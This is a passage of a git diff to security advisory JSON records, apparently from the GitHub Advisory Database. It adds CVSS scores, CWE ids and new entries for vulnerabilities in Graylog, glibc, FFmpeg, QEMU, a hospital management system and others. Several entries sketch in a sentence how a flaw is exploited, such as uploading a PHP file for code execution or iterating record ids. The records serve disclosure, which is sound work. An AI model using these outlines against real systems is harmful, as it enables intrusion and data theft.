@@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5hp8-hwcv-h225", - "modified": "2026-02-18T15:31:26Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T15:31:26Z", "aliases": [ "CVE-2026-1437" ], "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Graylog Web Interface console, version 2.2.3, caused by a lack of proper sanitization and escaping in HTML output. Several endpoints include segments of the URL directly in the response without applying output encoding, allowing an attacker to inject and execute arbitrary JavaScript code when a user visits a specially crafted URL. Exploitation of this vulnerability may allow script execution in the victim's browser and limited manipulation of the affected user's session context, through the '/system/authentication/users/edit/' endpoint.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-5pqm-c33h-22jc/GHSA-5pqm-c33h-22jc.json b/advisories/unreviewed/2026/02/GHSA-5pqm-c33h-22jc/GHSA-5pqm-c33h-22jc.json index 89bf8cfaa988e..2a4bc316e8b57 100644 --- a/advisories/unreviewed/2026/02/GHSA-5pqm-c33h-22jc/GHSA-5pqm-c33h-22jc.json +++ b/advisories/unreviewed/2026/02/GHSA-5pqm-c33h-22jc/GHSA-5pqm-c33h-22jc.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-5pqm-c33h-22jc", - "modified": "2026-02-18T18:30:40Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2025-70146" ], "details": "Missing authentication in multiple administrative action scripts under /admin/ in ProjectWorlds Online Time Table Generator 1.0 allows remote attackers to perform unauthorized administrative operations (e.g.,adding records, deleting records) via direct HTTP requests to affected endpoints without a valid session.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-306" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-18T17:21:35Z" diff --git a/advisories/unreviewed/2026/02/GHSA-62j7-j842-x6r6/GHSA-62j7-j842-x6r6.json b/advisories/unreviewed/2026/02/GHSA-62j7-j842-x6r6/GHSA-62j7-j842-x6r6.json index 8d39404dbb3f4..fe04198c2c7f8 100644 --- a/advisories/unreviewed/2026/02/GHSA-62j7-j842-x6r6/GHSA-62j7-j842-x6r6.json +++ b/advisories/unreviewed/2026/02/GHSA-62j7-j842-x6r6/GHSA-62j7-j842-x6r6.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-62j7-j842-x6r6", - "modified": "2026-02-08T00:30:59Z", + "modified": "2026-02-18T21:31:18Z", "published": "2026-02-08T00:30:59Z", "aliases": [ "CVE-2026-25566" ], "details": "WeKan versions prior to 8.19 contain an authorization vulnerability in card move logic. A user can specify a destination board/list/swimlane without adequate authorization checks for the destination and without validating that destination objects belong to the destination board, potentially enabling unauthorized cross-board moves.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-7qhw-4fcq-2g37/GHSA-7qhw-4fcq-2g37.json b/advisories/unreviewed/2026/02/GHSA-7qhw-4fcq-2g37/GHSA-7qhw-4fcq-2g37.json new file mode 100644 index 0000000000000..57e23d8b5df16 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7qhw-4fcq-2g37/GHSA-7qhw-4fcq-2g37.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7qhw-4fcq-2g37", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2025-0577" + ], + "details": "An insufficient entropy vulnerability was found in glibc. The getrandom and arc4random family of functions may return predictable randomness if these functions are called again after the fork, which happens concurrently with a call to any of these functions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0577" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2025-0577" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2338871" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-331" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-844q-r72x-vfmv/GHSA-844q-r72x-vfmv.json b/advisories/unreviewed/2026/02/GHSA-844q-r72x-vfmv/GHSA-844q-r72x-vfmv.json index afb076718911f..3ca5dad8bd323 100644 --- a/advisories/unreviewed/2026/02/GHSA-844q-r72x-vfmv/GHSA-844q-r72x-vfmv.json +++ b/advisories/unreviewed/2026/02/GHSA-844q-r72x-vfmv/GHSA-844q-r72x-vfmv.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-86c5-9jxx-m8g7/GHSA-86c5-9jxx-m8g7.json b/advisories/unreviewed/2026/02/GHSA-86c5-9jxx-m8g7/GHSA-86c5-9jxx-m8g7.json index 194cd692c6897..579a50df4db1c 100644 --- a/advisories/unreviewed/2026/02/GHSA-86c5-9jxx-m8g7/GHSA-86c5-9jxx-m8g7.json +++ b/advisories/unreviewed/2026/02/GHSA-86c5-9jxx-m8g7/GHSA-86c5-9jxx-m8g7.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-77" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-8gfj-223w-87pr/GHSA-8gfj-223w-87pr.json b/advisories/unreviewed/2026/02/GHSA-8gfj-223w-87pr/GHSA-8gfj-223w-87pr.json new file mode 100644 index 0000000000000..6b41a654786b3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8gfj-223w-87pr/GHSA-8gfj-223w-87pr.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8gfj-223w-87pr", + "modified": "2026-02-18T21:31:22Z", + "published": "2026-02-18T21:31:22Z", + "aliases": [ + "CVE-2025-70063" + ], + "details": "The 'Medical History' module in PHPGurukul Hospital Management System v4.0 contains an Insecure Direct Object Reference (IDOR) vulnerability. The application fails to verify that the requested 'viewid' parameter belongs to the currently authenticated patient. This allows a user to access the confidential medical records of other patients by iterating the 'viewid' integer.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70063" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Sanka1pp/f43c7eca5048152899e14412523afe80" + }, + { + "type": "WEB", + "url": "https://packetstorm.news/files/id/213711" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T19:21:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8rqj-9226-cwx7/GHSA-8rqj-9226-cwx7.json b/advisories/unreviewed/2026/02/GHSA-8rqj-9226-cwx7/GHSA-8rqj-9226-cwx7.json index ecca6b38fb478..0dc8672161cf7 100644 --- a/advisories/unreviewed/2026/02/GHSA-8rqj-9226-cwx7/GHSA-8rqj-9226-cwx7.json +++ b/advisories/unreviewed/2026/02/GHSA-8rqj-9226-cwx7/GHSA-8rqj-9226-cwx7.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-8rqj-9226-cwx7", - "modified": "2026-02-18T18:30:40Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2025-70151" ], "details": "code-projects Scholars Tracking System 1.0 allows an authenticated attacker to achieve remote code execution via unrestricted file upload. The endpoints update_profile_picture.php and upload_picture.php store uploaded files in a web-accessible uploads/ directory using the original, user-supplied filename without validating the file type or extension. By uploading a PHP file and then requesting it from /uploads/, an attacker can execute arbitrary PHP code as the web server user.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-434" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-18T18:24:20Z" diff --git a/advisories/unreviewed/2026/02/GHSA-9f49-2j27-6f79/GHSA-9f49-2j27-6f79.json b/advisories/unreviewed/2026/02/GHSA-9f49-2j27-6f79/GHSA-9f49-2j27-6f79.json new file mode 100644 index 0000000000000..3fa55c8e2dcc7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9f49-2j27-6f79/GHSA-9f49-2j27-6f79.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9f49-2j27-6f79", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-1200" + ], + "details": "A flaw was found in the rgaufman/live555 fork of live555. A remote attacker could exploit a segmentation fault, in the `increaseBufferTo` function. This vulnerability can lead to memory corruption problems and potentially other consequences.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1200" + }, + { + "type": "WEB", + "url": "https://github.com/rgaufman/live555/issues/65" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2026-1200" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430836" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-824" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9hwv-m488-9fjx/GHSA-9hwv-m488-9fjx.json b/advisories/unreviewed/2026/02/GHSA-9hwv-m488-9fjx/GHSA-9hwv-m488-9fjx.json index 47be1da9b23a1..30dbe19657616 100644 --- a/advisories/unreviewed/2026/02/GHSA-9hwv-m488-9fjx/GHSA-9hwv-m488-9fjx.json +++ b/advisories/unreviewed/2026/02/GHSA-9hwv-m488-9fjx/GHSA-9hwv-m488-9fjx.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-77" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-c96q-rf2r-2xj8/GHSA-c96q-rf2r-2xj8.json b/advisories/unreviewed/2026/02/GHSA-c96q-rf2r-2xj8/GHSA-c96q-rf2r-2xj8.json new file mode 100644 index 0000000000000..db2e0d8360e62 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-c96q-rf2r-2xj8/GHSA-c96q-rf2r-2xj8.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c96q-rf2r-2xj8", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2025-10256" + ], + "details": "A NULL pointer dereference vulnerability exists in FFmpeg’s Firequalizer filter (libavfilter/af_firequalizer.c) due to a missing check on the return value of av_malloc_array() in the config_input() function. An attacker could exploit this by tricking a victim into processing a crafted media file with the Firequalizer filter enabled, causing the application to dereference a NULL pointer and crash, leading to denial of service.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-10256" + }, + { + "type": "WEB", + "url": "https://github.com/FFmpeg/FFmpeg/commit/a25462482c02c004d685a8fcf2fa63955aaa0931" + }, + { + "type": "WEB", + "url": "https://github.com/FFmpeg/FFmpeg/commit/d3be186ed1bcdcf2c093d6b13a0e66dc5132be2a" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2025-10256" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2394495" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cf26-rj67-f4wr/GHSA-cf26-rj67-f4wr.json b/advisories/unreviewed/2026/02/GHSA-cf26-rj67-f4wr/GHSA-cf26-rj67-f4wr.json index 2120594c9543c..95f34df76cffa 100644 --- a/advisories/unreviewed/2026/02/GHSA-cf26-rj67-f4wr/GHSA-cf26-rj67-f4wr.json +++ b/advisories/unreviewed/2026/02/GHSA-cf26-rj67-f4wr/GHSA-cf26-rj67-f4wr.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-cf26-rj67-f4wr", - "modified": "2026-02-18T15:31:26Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T15:31:26Z", "aliases": [ "CVE-2026-1441" ], "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Graylog Web Interface console, version 2.2.3, caused by a lack of proper sanitization and escaping in HTML output. Several endpoints include segments of the URL directly in the response without applying output encoding, allowing an attacker to inject and execute arbitrary JavaScript code when a user visits a specially crafted URL. Exploitation of this vulnerability may allow script execution in the victim's browser and limited manipulation of the affected user's session context, through the  '/system/index_sets/' endpoint.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-cq5p-w4x6-m6h3/GHSA-cq5p-w4x6-m6h3.json b/advisories/unreviewed/2026/02/GHSA-cq5p-w4x6-m6h3/GHSA-cq5p-w4x6-m6h3.json new file mode 100644 index 0000000000000..882b4cca10a17 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cq5p-w4x6-m6h3/GHSA-cq5p-w4x6-m6h3.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cq5p-w4x6-m6h3", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:22Z", + "aliases": [ + "CVE-2026-2660" + ], + "details": "A vulnerability was identified in FascinatedBox lily up to 2.3. Affected by this issue is the function shorthash_for_name of the file src/lily_symtab.c. The manipulation leads to use after free. Local access is required to approach this attack. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2660" + }, + { + "type": "WEB", + "url": "https://github.com/FascinatedBox/lily/issues/385" + }, + { + "type": "WEB", + "url": "https://github.com/FascinatedBox/lily" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0122/blob/main/i385/repro.lily" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346458" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346458" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753164" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T19:21:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cw7v-qx8m-563q/GHSA-cw7v-qx8m-563q.json b/advisories/unreviewed/2026/02/GHSA-cw7v-qx8m-563q/GHSA-cw7v-qx8m-563q.json index 4721f7998d570..23ea9e8a19226 100644 --- a/advisories/unreviewed/2026/02/GHSA-cw7v-qx8m-563q/GHSA-cw7v-qx8m-563q.json +++ b/advisories/unreviewed/2026/02/GHSA-cw7v-qx8m-563q/GHSA-cw7v-qx8m-563q.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-cw7v-qx8m-563q", - "modified": "2026-02-18T15:31:26Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T15:31:26Z", "aliases": [ "CVE-2026-1438" ], "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Graylog Web Interface console, version 2.2.3, caused by a lack of proper sanitization and escaping in HTML output. Several endpoints include segments of the URL directly in the response without applying output encoding, allowing an attacker to inject and execute arbitrary JavaScript code when a user visits a specially crafted URL. Exploitation of this vulnerability may allow script execution in the victim's browser and limited manipulation of the affected user's session context, through the  '/system/nodes/' endpoint.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-ff7j-jwgr-hgxp/GHSA-ff7j-jwgr-hgxp.json b/advisories/unreviewed/2026/02/GHSA-ff7j-jwgr-hgxp/GHSA-ff7j-jwgr-hgxp.json index 36804edf5a62e..e433a13645a70 100644 --- a/advisories/unreviewed/2026/02/GHSA-ff7j-jwgr-hgxp/GHSA-ff7j-jwgr-hgxp.json +++ b/advisories/unreviewed/2026/02/GHSA-ff7j-jwgr-hgxp/GHSA-ff7j-jwgr-hgxp.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-ff7j-jwgr-hgxp", - "modified": "2026-02-18T15:31:26Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T15:31:26Z", "aliases": [ "CVE-2026-1436" ], "details": "Improper Access Control (IDOR) in the Graylog API, version 2.2.3, which occurs when modifying the user ID in the URL. An authenticated user can access other user's profiles without proper authorization checks. Exploiting this vulnerability allows valid users of the system to be listed and sensitive third-party information to be accessed, such as names, email addresses, internal identifiers, and last activity. The endpoint 'http://:12900/users/' does not implement object-level authorization validations.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-gq25-pccv-6q8j/GHSA-gq25-pccv-6q8j.json b/advisories/unreviewed/2026/02/GHSA-gq25-pccv-6q8j/GHSA-gq25-pccv-6q8j.json new file mode 100644 index 0000000000000..eb06a5878846a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gq25-pccv-6q8j/GHSA-gq25-pccv-6q8j.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gq25-pccv-6q8j", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2025-14876" + ], + "details": "A flaw was found in the virtio-crypto device of QEMU. A malicious guest operating system can exploit a missing length limit in the AKCIPHER path, leading to uncontrolled memory allocation. This can result in a denial of service (DoS) on the host system by causing the QEMU process to terminate unexpectedly.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14876" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2025-14876" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2423549" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gwrh-w4f9-ffc9/GHSA-gwrh-w4f9-ffc9.json b/advisories/unreviewed/2026/02/GHSA-gwrh-w4f9-ffc9/GHSA-gwrh-w4f9-ffc9.json new file mode 100644 index 0000000000000..6c56fdd48486d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gwrh-w4f9-ffc9/GHSA-gwrh-w4f9-ffc9.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gwrh-w4f9-ffc9", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-2665" + ], + "details": "A vulnerability was detected in huanzi-qch base-admin up to 57a8126bb3353a004f3c7722089e3b926ea83596. Impacted is the function Upload of the file SysFileController.java of the component JSP Parser. Performing a manipulation of the argument File results in unrestricted upload. The attack can be initiated remotely. The exploit is now public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2665" + }, + { + "type": "WEB", + "url": "https://github.com/huanzi-qch/base-admin/issues/38" + }, + { + "type": "WEB", + "url": "https://github.com/huanzi-qch/base-admin/issues/38#issue-3905100373" + }, + { + "type": "WEB", + "url": "https://github.com/huanzi-qch/base-admin" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346462" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346462" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753240" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T20:18:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-h5jq-923c-7w8g/GHSA-h5jq-923c-7w8g.json b/advisories/unreviewed/2026/02/GHSA-h5jq-923c-7w8g/GHSA-h5jq-923c-7w8g.json new file mode 100644 index 0000000000000..cdf2eee5fadeb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h5jq-923c-7w8g/GHSA-h5jq-923c-7w8g.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h5jq-923c-7w8g", + "modified": "2026-02-18T21:31:22Z", + "published": "2026-02-18T21:31:22Z", + "aliases": [ + "CVE-2026-0874" + ], + "details": "A maliciously crafted CATPART file, when parsed through certain Autodesk products, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0874" + }, + { + "type": "WEB", + "url": "https://www.autodesk.com/products/autodesk-access/overview" + }, + { + "type": "WEB", + "url": "https://www.autodesk.com/trust/security-advisories/adsk-sa-2026-0004" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T20:18:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hcrc-x9p4-f9jh/GHSA-hcrc-x9p4-f9jh.json b/advisories/unreviewed/2026/02/GHSA-hcrc-x9p4-f9jh/GHSA-hcrc-x9p4-f9jh.json index b92de6f89b751..4101ee5427854 100644 --- a/advisories/unreviewed/2026/02/GHSA-hcrc-x9p4-f9jh/GHSA-hcrc-x9p4-f9jh.json +++ b/advisories/unreviewed/2026/02/GHSA-hcrc-x9p4-f9jh/GHSA-hcrc-x9p4-f9jh.json @@ -29,7 +29,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-89" + ], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-jx8h-vrjj-cm6g/GHSA-jx8h-vrjj-cm6g.json b/advisories/unreviewed/2026/02/GHSA-jx8h-vrjj-cm6g/GHSA-jx8h-vrjj-cm6g.json new file mode 100644 index 0000000000000..a8fca98bcaedc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jx8h-vrjj-cm6g/GHSA-jx8h-vrjj-cm6g.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jx8h-vrjj-cm6g", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-2667" + ], + "details": "A vulnerability has been found in Rongzhitong Visual Integrated Command and Dispatch Platform up to 20260206. The impacted element is an unknown function of the file /dispatch/api?cmd=userinfo. The manipulation leads to improper access controls. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2667" + }, + { + "type": "WEB", + "url": "https://github.com/21151213732/CVE/blob/main/VICDP-Unauthorized%20Access1.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346464" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346464" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753262" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-266" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m4v3-95xp-3j5h/GHSA-m4v3-95xp-3j5h.json 